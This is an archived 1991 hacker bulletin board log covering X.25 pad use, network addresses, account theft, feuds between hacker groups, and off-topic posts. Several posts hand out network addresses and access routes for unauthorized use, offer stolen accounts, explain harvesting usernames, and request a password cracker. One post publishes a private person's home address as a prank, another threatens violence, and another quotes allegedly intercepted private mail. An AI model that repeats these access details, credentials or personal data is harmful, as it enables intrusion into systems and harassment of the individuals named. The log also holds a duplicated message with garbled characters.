Even if you have an account other than guest, the bbs user still has
to have write permission on some of the files ( to enter messgaes
and stuff), so you really can't protect that since there's no suid
on vms.. You can't even hide stuff under an unreadable directory,
since in vms's screwed up security, you won't be able to access
anything under that directory tree..
Probably the best way would be to ask the sysop for a captive acct
to run the bbs with and just contain the bbs user within the bbs..

[N]ext, [
         R]eply, [A]bort?
Message 175
From tchhacky at 21:20:20 on Fri Jul 19
Subject: Howdy

Does anybody know how to use an x28 pad that has a command'dial sra'?
thanks.

=========================

Message 176
From heartz at 21:31:13 on Fri Jul 19
Subject: Well

to faust: of course it would have to be a captive account, or someone
will just drop to DCL and nuke it, since it's V5.4, there shouldn't
be a problem.

 h.

=========================

Message 177
From faust at 06:59:49 on Sat Jul 20
Subject: hmm

So it is possible to drop to shell before 5.4? How?

=========================

Message 178
From heartz at 16:56:22 on Sun Jul 21
Subject: forget it.

  I don't think that should be discussed here.
for that matter, at all.

  h.

=========================

Message 179
From faust at 20:56:36 on Sun Jul 21
Subject: ???

Why not? Is it super-sensitive info or something??
Obviously I'm assuming that the bbs (or whatever other login script) has traps
for ctrl-y, ctrl-z, etc.
If there is some way around a properly set up script, I'd like to know
the general idea about it.
Don't discuss it if you don't want to though heartz.. nobody's making
you do anything.

=========================

Message 180
From ronnie at 21:01:45 on Sun Jul 21
Subject: well . . .

Isnt the fact that this is a base for hackers to share information
anything at all anymore. I mean seriously. If you dont want to share
the information you get, then you shouldntt talk about it
Wow! it's real big to say `I can do this and i can do that' but
the object is that you learn to do it for your own satisfaction, then
it is selfish. But then, if you are doing it for the good of others,
and trying to help epople out.. that is what this is all about.

I'm not bitching at you heartz.. i'm just saying.. If you want to be
selfish, then why should you(not you personally) c ome on here and
flaunt what you can do, etc.. kinda sounds like something MOD would
do.. I have nothering against anyone.. but i think the Free Distribution
of infomration sohould be just that.. free.. lateron
                            ronnie

=========================
Message 181
From hstreet at 00:32:30 on Mon Jul 22
Subject: heh

1)heartz is a lonely paranoid nerd who is a hypocrite
2)He really doesnt know it himself..he only heard that it is possible

=========================



Message 183
From hstreet at 17:04:43 on Mon Jul 22
Subject: i like to write but then again some bite!

please i am looking for a pen pal

write to me at:

carol a linde
1819 S CHEROKEE LN
LODI , CA 95240
area code (209)

=========================
Message 184
From orpheus at 18:53:55 on Mon Jul 22
Subject: uh oh

uh i just reaalized whose address that is. thatz n0t very nice!
.s

=========================
Message 185
From ronnie at 00:08:32 on Tue Jul 23
Subject: hmmm

hahahhahahha.. well.. i dont pass out info.. but oh well.. some people have thei
r ideals..

=========================
Message 186
From tchhacky at 01:42:25 on Tue Jul 23
Subject: phuck

that is the phuckn funniest thing I think I have ever seen, putting someone's ad
dress on a bbs. Thanks for the laugh hstreet

=========================
Message 187
From cyclopz at 11:21:18 on Tue Jul 23
Subject: Pads

Blammo i dont care how much you love usin a god to goto a pad
its fuckin SLOW and it sucks......But at least it werks...
Later..CyClopz!...The Perturbed

=========================


Message 188
From galileo at 18:20:30 on Tue Jul 23
Subject: hstreet / address

I dunno who's address that is
I dunno who wrote that message
I dunno who the account was stolen from

But this is what I think:

Whoever wrote those two messages
(that and the one to Heartz)
Is the lowest of the scummiest motherfucka
and should feel sorry for itself.
('cause I certainly don't).


=========================
Message 189
From ronnie at 20:08:08 on Tue Jul 23
Subject: welll.....

i know hstreet wouldnt do that for one thing so i'm not
worried about that at all.. but i am worried about whoever did it.. blah

later
ronnie | no mental disorder like some people have

=========================

Message 190
From blammo at 23:52:05 on Tue Jul 23
Subject: cylopz..

i don't like using outdials to call overseas to get here..but at least
it's better than using some shitty NUI like dynapac (i know it's dead,
just an example). if i had a local telenet # i wouldn't have this
problem..oh well.
btw, for those who haven't noticed trtsvc is passworded.

=========================

Message 191
From cyclopz at 13:58:27 on Wed Jul 24
Subject: Trt

Yeah same prob here blammo no local Telenet..
and guess what trt isnt pw'd anymorew,...
Later


=========================

Message 192
From blammo at 20:09:27 on Wed Jul 24
Subject: trt

out of the kindness of my heart, here's a pad that trtsvc calls which
seems to call anywhere (including lutz): 487220390
i'm such a nice guy.

=========================

Message 193
From tchhacky at 21:35:31 on Wed Jul 24
Subject: gs/1's

I swear to god man that everytime I try to use a gs/1 it never frigin works.
Do any of you guys have any documents on gs/1's or anything you guys have to say
 on them cause I am pissed off
Thankyouverymuch

=========================

Message 194
From ronnie at 21:40:59 on Wed Jul 24
Subject: hmm gs/1

i'm also looking for any info on gs/1's.. blah.. i got all kinds of them
all over the palce and i dont know how they work! blah
lateron
ronnie

=========================

Message 195
From orpheus at 22:01:54 on Wed Jul 24
Subject: gs/1

well theres a file er 2 floatin around bout gs/1 like dr dissectorz
. i only have printed copies and none on  magnetic media so i cant
help ya unless u want me to retype  the whole file. (which i wuldnt
dream of doing) so  just ask sum1 cuz lotzaa ppl have it

=========================

Message 196
From blammo at 22:07:49 on Wed Jul 24
Subject: gs/1z

well, the only 2 GS/1 pads i ever tried to use used the format:

c !128#026245400080177

i think the 128 part is what varies between pads though..it's like the
port or something (i guess). i'm not entirely sure, but that's the
only working method i know of.

=========================

Message 199
From orpheus at 07:07:24 on Thu Jul 25
Subject: gs/1

yeah . thats the port #. u type SHOW ADDR and look fer the port #.
its the # after the !. then when u tri 2 pad out use a port # 1 above
or below the port u saw in sh address

=========================

Message 207
From machine at 12:19:22 on Thu Aug  1
Subject: Call..

IMX/2 -> 23224179036
nice chat/mailbox system in Austria.

- Machine -

=========================


Message 208
From gazr at 00:27:21 on Sat Aug  3
Subject: theft

Okay guys, I think I should tell you that Paradox has stolen my account.
Like a dick, I trusted him with it, and he has now changed the password
so he can do what he likes with it. So, if you get any shit from
someone called 'doctord', you'll know it's him. The fucking LAMER !

   The real Doctor Devious


=========================

Message 208
From gazr at 00:27:21 on Sat Aug  3
Subject: theft

Okay guys, I think I should te

                              X?+4]tat Paradox has stolen my account.
Like a dick, I trusted him with it, and he has now changed the password
so he can do what he likes with it. So, if you get any shit from
someone called 'doctord', you'll know it's him. The fucking LAMER !

   The real Doctor Devious


=========================

Message 209
From spirit at 06:10:09 on Sat Aug  3
Subject: Mmm

Wasn't the real paradox!

So.

=========================

Message 210
From blammo at 07:48:02 on Sat Aug  3
Subject: blah


harumph, even.
that's what i say.
too much account thieving going on around here...
just goes to show you shouldn't trust people with yer account.
and you shouldn't use tymnet.

=========================

Message 211
From cloud at 10:13:21 on Sat Aug  3
Subject: theft

I guess the moral of that story is: NEVER trust ANYONE with ANY
account of yours on ANY system

=========================

Message 213
From spirit at 17:24:23 on Sat Aug  3
Subject: ...

Or just don't use Tymnet!!!

So.

=========================

Message 214
From galileo at 17:25:37 on Sat Aug  3
Subject: doctord theft

Doctor Devious should have never given
out the password to his account. What a silly
thing to do! But people learn from mistakes.

However, Doc Dissector, I know you like the
account because of your name, but I really think
it would be pretty decent of you to give it back.

You are respected bay many (including me) for
your fine Killer Cracker efforts. I think your

image would be strengthened if you gave rthe account back.

=========================
Message 217
From private at 09:10:09 on Thu Aug  8
Subject: bhahaha

actuallyy, i have nothing to dowit tht eh accund theft... blah.sp...
and i have no usre for spare or extra accounts on lutzifer, so i
reallyy don't know what everyone is talking about... er... yeah
pardox is mod ro something, but who cares now nayway...
neway... id d not steal the acct... i've been
doin' other things... ehehe..


doc. dissector... not doctor devious
or anyone else for that matter

=========================
Message 218
From machine at 10:44:54 on Thu Aug  8
Subject: PEGASUS

228475212574  (it's a NUA)

- Machine -

=========================

Message 219
From orpheus at 21:03:49 on Sat Aug 10
Subject: u-con bbs

U-Con BBS - underground connection
on node lina

22222800173
use GUEST account and typwe this simple command after login

run [guest.dragon]bbs

if you have your own acct on lina, just mail me here telllin me whut your uswrer
name on lina is
so i can add u to the access control lisy

bbs has 5 message bases, and mail.

no lamers please

=========================

Message 220
From orpheus at 09:30:11 on Sun Aug 11
Subject: bbs

if u called bbs b4 and got error msg, i  was werking on it. its fixed
so ucan kall it now

=========================



Message 221
From cythief at 04:01:22 on Thu Aug 15
Subject: Internet

     yo does anyone have any NUA's with full Internet access (not merit x25s)

oops...as I said , none with x25s (like merit)..or a nuas to a unix or something

shit I fuckin hate this no word-wrap shit...anywyz on a unix or something
that is on the internet ...please mail it to me at biox  cythief
              later,
                           Count_ZER0/LoL/IHA

Message 222
From anthrax at 08:06:40 on Thu Aug 15
Subject: Internet

try 505236023008 It is the nua for Vicnet at RMIT in Australia.  At the
which service? prompt, you can enter a range of requests, such as ccannex
csannex, cdcnet, wmensa, godzila, and some more.  From these servers you
have access to a huge number of unix's and acouple of vaxes.

Hope that helps.  If you need some accts then just mail me.

Anthrax

=========================

Message 223
From cythief at 00:49:59 on Fri Aug 16
Subject: Internet again

    that nua (in msg #222 ..I think!) worx and stuff but it
always gives me a time-out when I try to reach spies.spies.com
or anyother internet address in the U.S....the system I use is
ththe ccannex one, and from there I type telnet and then its
like anyother unix or whatever..well, tell me other ways or
if U figure anything out with it...thanx a lot for all your help
                later daze,
                     Count_ZER0/LoL/IHA


=========================

Message 224
From anthrax at 16:02:28 on Fri Aug 16
Subject: Internet once again..

Well, you will most certainly need to get an account on one of the systems
accessible from the annexes.  I have accounts I can give you, from cdcnet and
from ccannex
            , if you like.  A few months back, I used to be able to connect to
WMENSA, and from here enter connect <ip>, and it would connect me regardless.
However due to some abuse they have stopped this route of access *grin*.
Anyway, to get some valid accts from the annes, use the who @ command, i.e.
just like the finger command.  If you need any more help with Vicnet, just ask.
ANTHRAX


=========================
Message 225
From tango at 18:57:46 on Sat Aug 17
Subject: help?

hiya..!
ey..can u give me any account for a unix ?
is for use the ftp command..i need some files.
so i need it download....
if u can give me an account i will appreciate too much.
thnaks


=========================

Message 227
From getafix at 00:23:52 on Mon Aug 19
Subject: Internet > Janet

Duhh, is there a way once you're on Internet to connect up to a JANET
pad or any JANET site? Enquiring minds would like to know!
ta muchly, catchya laters potatas

=========================

Message 228
From mayhem at 15:22:28 on Mon Aug 19
Subject: USSR


        ``In view of Mikhail Gorbachev's inability to perform the duties of
the federal president and the transfer of federal presidential powers,
in keeping with paragraph 7, article 127, of the USSR Constitution, to
Vice President Gennady Yanayev,
        ``With the aim of overcoming the profound and comprehensive crisis,
political, ethnic
                  and civil strife, chaos and anarchy that threaten the
lives and security of the Soviet Union's citizens and its sovereignty,
territorial integrity, freedom and independence,
        ``Proceeding from the results of the popular referendum on the
preservation of the Union of Soviet Socialist Republics,
        ``And guided by the vital interests of all ethnic groups in the
country and all Soviet people,
        ``The Soviet leadership resolves:
        ``First, in accordance with paragraph 3, article 127, of the U.S.S.R.
Constitution and article 2 of the U.S.S.R. law on state of emergency
regulations and with demands by broad popular masses to adopt the most
decisive measures to prevent society from sliding into national
catastrophe and ensure law and order, to impose a state of emergency in
some parts of the Soviet Union for six months from 04:00 Moscow time on
August 19, 1991.
        Secondly, to establish that the federal constitution and laws have
unconditional priority throughout the territory of the U.S.S.R.
        Thirdly, to form a state committee for the state of emergency in
order to run the country and effectively exercise the state of emergency
regime, consisting of:
        O.D. Baklanov, first deputy chairman of the U.S.S.R. defense council.
        V.A. Kryuchkov, chairman of the KGB.
        V.S. Pavlov, prime minister of the U.S.S.R.
        B.K. Pugo, interior minister of the U.S.S.R.
        V.A. Starodubtsev, chairman of the farmers' union of the U.S.S.R.
	A.I. Tizyakov, president of the association of state enterprises and
industrial, construction, transport and communications facilities of the
U.S.S.R.
        D.T. Yazov, defense minister of the U.S.S.R.
        G.I. Yanayev, acting president of the U.S.S.R.
        Fourthly, to establish that the state committee for the state of
emergency's decisions are mandatory for unswerving fulfilment by all
agencies of power and administration, officials and citizens throughout
the territory of the U.S.S.R.
        The statement was signed by Yanayev, Pavlov and Baklanov.


=========================
Message 229
From scott at 19:20:57 on Mon Aug 19
Subject: Sports Net

If anyone could help me find out how to log
                                            on to Sports Net i would be very muc
h appreciative. will trade any thing for it. you can log on through, telenet, co
mpuserve, or wats. just need an account.

=========================
Message 230
From heartz at 02:21:50 on Wed Aug 21
Subject: scott?

do you mean the USA Today Sports Center?

  h.

=========================

Message 231
From lethal at 03:27:02 on Wed Aug 21
Subject: phrack

hmmm don't have  the address to phrack..
but if you call the states for free
you canreach  a few BBS's and d-load
them.. will try to get
the address for ya though..later

=========================

Message 232
From mayhem at 13:25:02 on Wed Aug 21
Subject: Phrack FTP

FTP PHRACKS and a shitload of others at:

 chsun1.uchicago.edu
 /pub/Text.Phracks/

=========================

Message 233
From midas at 14:40:07 on Wed Aug 21
Subject: WHY WHY WHY ?

Why give out the Vicnet nua here?
That has systems on it that are VITAL to Australian hackers,
which will collapse with international weight.
Sharing of info is one thing, but ridiculous invitations to the entire hack worl
d are another.

    midas.


=========================

Message 234
From blammo at 22:38:17 on Wed Aug 21
Subject: vicnet

sounds to me like you're just afraid you won't stand out in the
international hacking community as well as you stand out in the
australian hacking community..which i can relate to...i'd hate it if
someone started hacking a network that i considered myself one
of the most knowledgable people about...but what you have to do is make

sure you'll STILL be one of the best, even with the extra weight of
international hackers..that's where the incentive is. since international
hackers probably know much less about vicnet than you, you've already
got a head start.

think of it this way- vicnet could become an incredibly popular place to hack,
(popular place to hack..<got line noise>)..and you could be the best
vicnet hacker, if you 'play your cards right' (so to speak)..it's a great
opportunity. so tell people how to access the network, and take the challenge
for your own benefit.

^the ramblings of a tripping midnite.

=========================
Message 235
From me at 00:44:58 on Thu Aug 22
Subject: Hackbase

in my defence id like to make clear that i did not crash hackbase
or Orpheus' vax.. i dont even understand the jibberish that Cyclopz
started, but it wasnt neccessary.. Anyway about the Question if
when you are on Internet can you reach a JANET site or pad..well
i believe so since i am on an internet address taht is also a Janet
site or reached by a Janet (NUA). Well, I invite you all to my bbs.
Leave me mail for the #.. thanks

                                                me=Code Of Honor

=========================

Message 236
From lethal at 03:07:47 on Thu Aug 22
Subject: Janet

Well to get to Janet off internet, you telnet to sun.nsfnet-relay.ac.uk, and at
the log on promt type janet, and bam, you is on a janet pad...


LEthal
/s

=========================

Message 237
From me at 04:40:49 on Thu Aug 22
Subject: MOD

This is NOT Code Of Honor.

Just thought everyone would find this intresting.
I was only able to get part of the file, but it gets the point across.


                           *=*=*=*=*=*=*=*=*=*=*=*=*=*
			   +                         +
                           *     NASTY JOURNAL #2    *
                           +                         +
                           *=*=*=*=*=*=*=*=*=*=*=*=*=*


During the past few months NASTY has taken a small vaction. During that time
MOD has bragged about 'crushing NASTY with my thumb'. Well it just got to
unbearable. It's time for us to show the little shits for what they really
are.

Oh by the way MOD:

An individual wishing to remain anonymous wishes to say
'Corrupt, the angry man wishes to say MOD fucks dogs.'

Well, let me start of by recapping the situation. MOD claims to be so dam
untouchable. They also claim WINGNET and their UNIX are so dam secure.
hehe what a joke. During the time NASTY has been 'crushed', we have been
monitoring WINGNET! All of the mail, files, password files, messages,
and lovers quarrels have been intercepted. YES we OWN MOD! This file
is only the first of several! By the way, the angry man says that the
telenet database is pretty impresive even for a bunch of losers! EVERYTHING,
I mean EVERYTHING is going to be made public. Including but not limited to
MOD's 'PRIVATE' database! During the course of several weeks we at NASTY
will be studying MOD in depth! Now the public can know everything that MOD
knows. (Isn't that great? woopy!)

============================================================================

From NEW USER ACCOUNT CREATOR Thu Aug 24 00:29:01 1995

LOGIN NAME: avatar
   USER ID: 2004
  GROUP ID: 100
     GECOS: THE AVATAR
      HOME: /pub/avatar
     SHELL: /bin/notvalidated
   PHONE #: 785-4544

From uucp Tue Jul 30 03:07 EDT 1991
>From uunet!eff.org!knight  Tue Jul 30 03:07:06 1991 remote from cosi
Received: by modnet.UUCP (smail2.5)
        id AA06323; 30 Jul 91 03:07:06 EDT (Tue)
Received: by cosi.UUCP (smail2.3)
	id AA00467; 29 Jul 91 23:51:16 EDT (Mon)
Received: fr
            om eff.org by relay2.UU.NET with SMTP
        (5.61/UUNET-internet-primary) id AA26798; Mon, 29 Jul 91 23:44:02 -0400
Received: by eff.org (5.61+++/Spike-2.0)
        id AA20540; Mon, 29 Jul 91 23:43:42 -0400
Date: Mon, 29 Jul 91 23:43:42 -0400
From: uunet!eff.org!knight (Craig Neidorf)
Message-Id: <9107300343.AA20540@eff.org>
To: modnet!root
Subject: Cancelled


It was cancelled because of the economic summit.  Who in MOD is this?

kl
cont.

=========================
Message 238
From deth at 09:43:13 on Thu Aug 22
Subject: more!

hey how boutz gettin the rest of that file ups here?

=========================

Message 239
From lethal at 11:27:30 on Thu Aug 22
Subject: hats off

hey, you said a mouthful...but everything youstated is true.  Our societ
is stagnating and it is oppressed.  People really don't have a voice
anymore, or they are just getting too soft and/or lazy to use their voices
..hmmm I think they would rather leave the speaking and decision making up
to the fucking lame schmucks who lobby for all the bullshit laws that are
being passed all the time.  Hackers need to be educated in all the aspects
but of course it is getting to the point where they can't...why??  Because
they cannot get on any of the BBS's where they could learn and get educat
d in all ways of H/P because of the lengthy info forms, voting, NUP's etc
that they have to know before getting an account..so fuck it anyway...
Hackers are destroying hackers as time goes on...if all these "elite" fags
would take the time out to educate all the potential hackers out there,
and guide them towards some kind of goal..then there would be a force to
be reckoned with....but this probably wont happen... fuck it let's have
some good ol' fashioned Anarchy for a change..

=========================

Message 240
From scott at 17:08:14 on Thu Aug 22
Subject: sportsnet

no it is off of coinet net on telenet, it is c 20366.
and the accounts are like tx249, and the pw i have no idea about. any help?
from what i hear, the system is neat. alsop what is this usa today, do yo ]
they have something to do with sport cards?

=========================

Message 241
From scott at 17:10:41 on Thu Aug 22
Subject: the same

this may sound stupid, but how do you get to internet and shit
from tymnet, i know nothing about internet, i would like to be
able to get to shit like edu.phrack. etc... thanks.\

=========================

Message 243
From blammo at 03:15:11 on Fri Aug 23
Subject: scott-internet

well, i don't know of any direct x25-tcp/ip connections, unless that
kometh telepac gateway (22847911065) actually works..but, you can call
311061700313 (pcp od) and d 2587111 for terminus...which allows almost
unlimited internet access as far as sites go, but has limited usage.
otherwise, find another od and call one of the many other internet servers
that i don't know offhand.

=========================

Message 244
From fear at 05:03:58 on Fri Aug 23
Subject: amazing

  So MOD is outdone by another group of egotistical power tripping fuckers
who will exploit other hackers for personal fame & ego food?
  Now this is fucking progress.
					-Fearful

=========================

Message 245
From cyclopz at 06:03:19 on Fri Aug 23
Subject: Amaizing!!!

So You've Noticed taht hmm? aint Life grand...
As for terminus..IT SUX DICK...half the time iT Locks what
ya want ta telnet too./..
Instead Try FOGNET SFSU 415-338-2400...Dont know the Od...
Muchas Better..
CyClopz!...

=========================

Message 246
From me at 06:04:39 on Fri Aug 23
Subject: NASTY

We at NASTY are not exploiting other hackers for fame. Hell I really
couldn't care less if NASTY was well know. In fact I would prefer to
stay out of the publics eye as much as possible. At the time that
that file was released we were (I was) having a few problems with MOD,
well well, they have cleared up, so that file will be the last.

=========================

Message 247
From me at 06:57:25 on Fri Aug 23
Subject: bbs'

well id like to state that my bbs, has
#1. No infoforms
#2. No New User Password
#3. Is a place for education. or was a while ago, and hopefully again.

asl well id like to state that those messages about MOD were from
Renegade Hacker he uses this account also.. well i just dont want to
be on MODs bad side.. because thats all i dont need now.. but im


saying i actually support them.. but id rather stay even..

=========================
Message 248
From me at 07:02:10 on Fri Aug 23
Subject: Hmm

Well, as for NASTY and you, please write me@renegade hacker after your

messages because i dont want to get people confused., or ill just keep
my account

                                                        me@Code-of-Honor
leave mail for my bbs #

=========================
Message 251
From me at 01:36:37 on Sat Aug 24
Subject: NASTY

NASTY's mailing address is:

renegade@hale.uucp

(I screwed up the last time)

=========================

Message 252
From me at 20:32:58 on Sat Aug 24
Subject: NASTY

We need articles for NASTY Journal release 3, it is half way
finished. Anyone wanting to write an article or has one that
they wish to contribute, please mail it to 'me' on Lutzifers, or
send it to: 'renegade@hale.UUCP' (Or mail it to me on Bellcore Exchange,
Code Of Honors system).

=========================

Message 253
From kaleidox at 01:59:09 on Sun Aug 25
Subject: gs/1

Does anyone have anything detailed about the gs/1 data servers? They
look canned..can they be used to connect to systems outside their
own net?

Oh, does anyone happen to have the Pope's fone number? A friend of mine
is looking for anything inside the Vatican..the closer to His
Holiness the better.


=========================

Message 254
From lethal at 04:03:11 on Sun Aug 25
Subject: GS/1

Dr. Dissector wrote a damn good file on GS/1...Look it up on yer local h/p board
.
GS/1 at 311042200106


=========================

Message 255
From me at 08:19:52 on Mon Aug 26
Subject: NASTYJ03

The NASTY JOURNAL RELEASE 3 is complete and ready for distribution.
If you want a copy sent to you let me know at what address. (Or your user name o
n her
user name on here.)

=========================

Message 256
From jello at 08:34:19 on Mon Aug 26
Subject: "NASTY"

What the hell, that clipping of the "nasty" journal promised
releases of MOD secret files and shit. But now that their problems
are resolved, they are gonna bail out on all that shit.

I have one thing to say, WHAT A FUCKING GROUP OF PUSSYS!!

MoB Would have never done something that un-elight as to make
promises and bail out on them. Looks like a need for a second coming.


=========================

Message 257
From midas at 10:24:13 on Mon Aug 26
Subject: UNIX PASSWORD CRACKER

Gday all.
          It is of particular importance for me to crack a number of unix
passwords.  Does anyone out thre have the type of program that encrypts
possible pwords and compares them with the pword file?
I am quite DESPERATE.  Any assistence areciated.
(appreciated)

          Midas.

q

=========================

Message 258
From midas at 10:32:25 on Mon Aug 26
Subject: slightly misdirected logic

    Being the 'best' is of no interest to me.  Vicnet security would
surely increase a thousand fold, making it useless to EVERYONE.
There is nothing special about the vicnet network..
Its just that its convenient.

    Sharing is one thing.  There are limits,  however.  Sharing to
such a huge degree will mean no gain for anyone, but a loss for a few.

    Midas.

=========================

Message 259
From me at 17:39:09 on Mon Aug 26
Subject: MOD/NASTY

Whatever you say guy. We are not bailing out, we just resolved our
differences and proved the point we wanted to prove. Besides, why
are you so eager to get the rest? Are you some kind of mega leach? A NARC,
and you were hoping to get a fat bonus? Anyway, MOB? I just heard about
it. from what I hear it's pretty lame. So why don't you enlighten us!
The only reason we released it in the first place was to piss them off
and prove that MOD was 'touchable', now that we have proved it it has
served our purpose.
    Not to mention, the whole file was never put up here.

=========================

Message 260
From lutz at 23:40:25 on Mon Aug 26
Subject: account-proceedings

Hi all
pls read the update for account-proceedings by requesting  help
on creating accounts from within minish.
Thanx, Lutz

=========================

Message 261
From spirit at 03:06:57 on Tue Aug 27
Subject: new account-proceesings

ANyone have any idea whatever of what lutz is trying to accomplish with
the 'new' acct-proceedings?  I don't see the logic.
Oh well, I guess when you own the system you get to run it like ya want.
byebye lutz

So.

=========================

Message 263
From freebird at 21:49:02 on Tue Aug 27
Subject: new accts

I think it's a shame that most existing accts will
                                                   be terminated by
Oct 1st.  One of the things that I've most liked about lutz as
opposed to QSD and some other chats, is that ppl are identifiable
for the most part by their accts.  On QSD, you never really know
who ur talkin to, and I guess that's the way that lutz will be
after Oct 1st, since I can't see any realistic way that anyone
will be mailing lutz their real name / address given the dodgy
methods that almost all of us use to get here.

I don't understand what the problem is with the accounts the way
they are now since most ppl seem to be pretty happy the way things

are?  Maybe what we need is a vote, but then, this is Germany :)

I can understand the need for validating new accts, but if an
existing acct is not causing any trouble with the system, then
is there any particular reason why it should be deleted?  And what
purpose would it serve to require our names and addresses to be
registered with the system?  I don't see how this would improve
things for the users on the system, or for anyone else for that
matter.

After Oct 1st, there will be very few remaining accts on Lutz.
Seems a pity.

=========================
Message 264
From scott at 23:16:31 on Tue Aug 27
Subject: ?

send one to scott. on here. thanks.

sss

=========================
Message 265
From me at 00:14:14 on Wed Aug 28
Subject: XBBS/Parisite

Im looking for a Unix BBS  preferably Parisite which i  hear hides it
self on unix, but if xbbs hides itself then that would be good to.. or
even if it doesnt.. so either mail me the source. or more preferably
send it to my bbs. (mail me for the #) ill think of something to give
in return.

                                                me@Code Of Honor!

=========================

Message 266
From orpheus at 06:23:11 on Wed Aug 28
Subject: bomb threat guide

thiz file i found might be interesting to aanarchists, it
tells sys operators to do if they get a bomb threat


SYS$SYSDEVICE:[CGI.ORDB22.E5.TEXT]BOMB.DOC;1

**********  OPERATOR INSTRUCTIONS FOR BOMB THREATS  ********************

1) Remain calm.  It is very important you gather as much information
   as possible from the caller.

2) What is your name?

3) Where is the bomb?  What is the address?  What floor?  What office?
   What does it look like?

4) When is the bomb set to go off?

5) How do you know so much about this?

6) Do you realize innocent people might be killed?

7) May I connect you with the police?

8) Caller characteristics.  Please note as much about the caller as
   possible:
        A) Accent
        B) Tone of voice
        C) Seemed drunk or
        D) Read a statement (text of statement)
        E) Seemed calm or nervous



-orph

=========================

Message 267
From lethal at 03:42:04 on Thu Aug 29
Subject: new

Hmmm...hey Lutz, if the account don't cause trouble, then it doesn't have a caus
e for deletion...Simple as that...



=========================
Message 270
From vmem at 15:59:28 on Sun Sep  1
Subject: WINGNET

You fucking putz, you haven't monitored WINGNET you shmuck. All you did
is get that information from skreamer, a idiot. Whoever has the me account
I just want to tell you that you have just shown your true ignorance...
If 'me' monitored WINGNET, that is hella cool, because you DIDNT have a
account on there and don't even say something really stupid like, I put
a datatap on the #... Just give it up everyone, MoD ISN'T stupid, some-
times careless BUT EVERYONE is sometimes. All MoD rumors that are going
claiming they are complete bummbling fools, I and all who know MoD very
well, will say 'Not even...'

   Also, I heard from this code kid that Phrack is still going to be
continued... If anyone talks to that putz, Crimson Death, tell him that
PHRACK IS DEAD. It died after Knight Lightning stopped writting it, the

magazine sucked, and why does he try to 'resurecte' it? For all the peopol
who liked it, let them still think of Phrack in a good way, and not this
horrible pseudo-Phrack.

   BTW, if you are going to write a newsletter, you better make DAMN sure
if you write it and plan on writing it for a long time, THINK OF DECENT
TOPICS for future letters because if you don't the next one will probably
be totally shitty and you'll have stories in there like, 'How to Trash
CO's' anything pathetic such as the latter, don't put in the magazine,
its not worth it.

   I am quit annoyed by the a) Newsletters that are released by total
idiots, b) all the lame groups, who know nothing, and DON'T WISH TO LEARN
... Well I just wanted to say this :)
         Virtual/Memory
Fuck I'm tired

=========================
Message 271
From me at 04:39:05 on Mon Sep  2
Subject: re: Wingnet

well id like to just get myself out of this strange ordeal.
i had notthing to do with wingnet nasty or whatever.. the
account me is owned by me :) (code of ohonor) and renegade hacker
so whatever.. i know mod isnt stupid so i wont say any of such
nonsence, besides im on wingnet, so i suppose i wouldnt babble..


                                        me@Code Of Honor

=========================
Message 272
From me at 07:16:39 on Mon Sep  2
Subject: MOD

Well, the information we got off of MODNET was not from SKREEMERS account.
Ask CORRUPT or OUTLAW who the 'Angry Man' is... That will explain everytjhing

=========================

Message 273
From gauloise at 22:19:55 on Mon Sep  2
Subject: Donald

ok, here he is : GERAMY's BIIGEST LAMER !!!

If u ever meet a guy called donald in here, don't give him n e thing.
I gave him a nui, and he changed the password. And now its all over
Germany!! I just got busted  because of that!! the police left 10
minutes ago!

Donald, If u read this, start running! When I find u, I'll gut u !!!!
damn lamer !!!!!!

=========================

Message 274
From jello at 08:11:23 on Tue Sep  3
Subject: 'nasty'

Nasty don't sound so nasty after all. Maybe something like wimpy, or slanderous
would be better.

ARRGH! too many buds!

Anyway, slanderous would be a much better title. Or maybe
Weekely World News? Oh yeah, that's already being used, for something
with probably more truth to it.

=========================

Message 274
From jello at 08:11:23 on Tue Sep  3
Subject: 'nasty'

Nasty don't sound so nasty after all. Maybe something like wimpy, or slanderous
would be better.

ARRGH! too many buds!

Anyway, slanderous would be a much better title. Or maybe
Weekely World News? Oh yeah, that's already being used, for something
with probably more truth to it.

=========================

Message 275
From me at 01:29:51 on Wed Sep  4
Subject: Jello

Jello, shut the fuck up you deranged crack head. NASTY is NASTY is NASTY!
We do not exist to please ANYONE, we do things because we need or want
to! Also, I simply said that I was thinking about releasing a weekly/bi-
weekly newsletter... Why   hy should we release the rest of the information
off of MODNET? Anyway, from what I understand there have been a few
people running around saying that they are in NASTY, well let me get
something straight, this is the full member list (In order of appearence):


                 RENEGADE HACKER
                    KLUDGE
                 POINT OF PRESENCE
                   PARMASTER

That's IT as of today, there may be some new additions in the near
future.

=========================
Message 276
From demonoid at 18:46:21 on Wed Sep  4
Subject: new accs policy

The fact that this chat system is logged, and that the mail
is also logged disturbs me. Granted, it is a sysop's
privilege to do such an unethical thing, but to request
legitimate user information such as a mailing address, or
phone number, that will no doubt be matched up with logs
is pretty insane, to say the very least.
In short: Let's be serious here, for crying out loud.
I have no idea what prompted this request on Lutz's
part, and I do not wish to know. All I can say is that
if Lutz opts to purge all accounts from here, it is his
privilege to do so, and we will be forced to relocate
elsewhere. If he enjoys a system with no users, then more
power to him.
The majority of us here, are civilized users, who do not
abuse our accounts, and if he wishes to purge us....
oh, well...

Demonoid

=========================

Message 277
From mayhem at 17:53:01 on Thu Sep  5
Subject: USSR


 So, the Union of the Soviet Socialist Republics has been
officially dissolved! Rendering republics with all powers
*Except* military. heh, each major republic has a huge
arsenal of nuclear weapons... which could make for some
serious civil warring ;)

 -mayhem-

=========================

Message 278
From zaphod at 07:04:10 on Fri Sep  6
Subject: 2600 meeting today / citicorp

Hi!

WHo comes to 2600 meeting at citicorp in new york city?
pls contact me.

=========================

Message 279
From vmem at 09:48:08 on Fri Sep  6
Subject: NASTY

There would be no hacker in his right mind, especially PAR, to join such
a group, especially one who talks shit... I dont care about it, and from
what I have heard, people reading it to me, the magazine sounds like
shit, to say the least. The only thing I have read that is worse is
SSWC tech journals, but NASTY I think gives it a run for the money.
Look whoever IS in NASTY, give it up. You are lame, you know nothing,
and if your members were compared to that of MoD's they outrange you
, in knowledge by miles. So? What do we do? Ask everyone who thinks NASTY
should exist if you get over 50 people who say so, then write it but
I just want you to  know that I and most 'hackers' who are knowledgable
think it is a total waste of text and hard-drive space for all the lame
boards that carry this pathetic pseudo-kewl-magazine. Get a life, and
I'm sure most NASTY members dont have one, then resort to locking your-
self in a room, and LEARN something for a change. Get yourself a 96oo
bbaud modem and become a fucking humble guy warez mongler. Ok?
       Hackers have turned to shit, most shouldnt even have the
fucking title, 'hacker' maybe 'moron' would fit or something.
          Virtual/Memory

=========================

Message 280
From me at 20:14:12 on Fri Sep  6
